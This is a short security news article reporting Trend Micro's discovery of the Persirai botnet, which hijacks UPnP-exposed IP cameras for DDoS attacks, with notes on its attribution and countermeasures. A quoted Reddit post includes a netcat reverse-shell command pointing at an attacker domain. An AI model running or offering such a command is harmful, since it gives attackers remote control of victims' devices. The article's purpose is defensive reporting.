Trend Micro has discovered a new attack on internet-based IP cameras and recorders powered by a new Internet of Things (IoT) bot dubbed Persirai.
The Persirai botnet has targeted over 1,000 different models of vulnerable IP cameras from a variety of manufacturers and is using the hijacked devices to carry out DDoS attacks – and the vast majority of owners don’t even know their devices are exposed.
According to Trend Micro, over 122,000 of the affected IP cameras across the globe can easily be discovered via the Shodan IoT search engine, with vulnerable products visible in China and Japan, through Europe and all the way across to the Americas. That said, Trend Micro notes that China accounts for the largest percentage of those IP cameras (over 30%).
IP cameras typically use Universal Plug and Play (UPnP), which are network protocols that allow devices to open a port on the router and act like a server, making them highly visible targets for IoT malware.
Trend Micro also uncovered evidence suggesting that the Persirai botnet has its origins in Iran.
“C&C [Command and Control] servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.
IP camera users who have encountered the malware attack have also noted its point of origin appears to be Iran.
“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.
The attack is based on the previously successful Mirai IoT strike against IP cameras that was used to disrupt the Internet with a giant DDoS attack in 2016.
The Persirai attack is disturbing on a number of fronts. For a start, the fact that it’s based on the open-source Mirai strike shows that the freely available source code has been – and will be – modified by attackers to strike again in different forms. Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.
While Trend Micro advises IP camera users to use strong passwords, Security Affairs reports that the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords. A better countermeasure is to disable UPnP features on your router – or disconnect the cameras from the internet altogether and set up a private VPN for remote access.
This article was originally published on CyberSecBuzz